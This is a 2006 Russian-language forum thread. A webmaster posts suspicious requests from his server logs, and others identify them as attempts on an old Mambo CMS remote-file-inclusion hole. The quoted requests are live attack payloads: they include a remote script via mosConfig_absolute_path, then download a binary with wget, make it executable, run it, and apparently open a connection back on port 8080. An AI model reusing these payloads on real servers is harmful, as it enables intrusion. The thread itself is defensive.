|
|
|
| проверял статстику, обратил внимание на странный запрос к странице:
option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;
wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106
%208080;08080;0;echo%20YYY;echo|
|
может есть у кого предположение что этим хотели сделать?
З.Ы. апач работает под виндой. Сервер только запустили, и там лежит только одна страничка index.php и все, больше там пока ничего нет. | |
|
|
|
|
|
|
|
для: localGhost
(16.01.2006 в 02:29)
| | Здесь явно ориентировались на *nix. | |
|
|
|
|
|
|
|
для: cheops
(16.01.2006 в 03:27)
| | елы-палы!! тут точно ничего страшного? что-то я начинаю волноваться! долбят достаточно часто. На это раз зафиксировал вот что:
option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://newporntalents.com/main/images/cse.gif?&cmd=df%20-h
|
| |
|
|
|
|
|
|
|
для: localGhost
(20.01.2006 в 19:21)
| | нет, если отключили глобальные переменные. А вообще это старая дыра в mambo | |
|
|
|
|
|
|
|
для: localGhost
(20.01.2006 в 19:21)
| | То, что ваш сайт хотят сломать уже является нехорошим звоночком, обновите всё, что только можете, слделайте резервные копии, пробейте адреса, скорее всего будут прокси, но бывает злоумышленики ленятся... | |
|
|
|
|
|
|
|
для: cheops
(20.01.2006 в 23:13)
| | проблема в том что, как я упаминал ранее, сервер установлен под виндой, на сервере одна единственная странца (пока) вот к ней постоянно и обращаються. Вычеслить ip не получаеться т.к. всех посетителей перекидывает на сервер маршрутизатор, и все они приходят с одним ip (ip маршрутизатора)
что такое mambo? | |
|
|
|
|
|
|
|
для: localGhost
(21.01.2006 в 02:16)
| | Кто-то ищет уязвимости на сервере (в скриптах). XSpider (программа-сканнер), например, имеет большую базу стандартных уязвимостей, по которой и тестируется целевой сайт. Вообще-то такие программы разрабатывались для "ленивых" веб-мастеров, которым неохота проверять свои сайт на уязвимости. Хакерам и особенно скрипт-киддисам такие программы ой как помогают при взломе. Возможно одна из таких прог и бомбардирует вашу страничку.
Mambo - CMS такая (http://ru-mambo.ru/). | |
|
|
|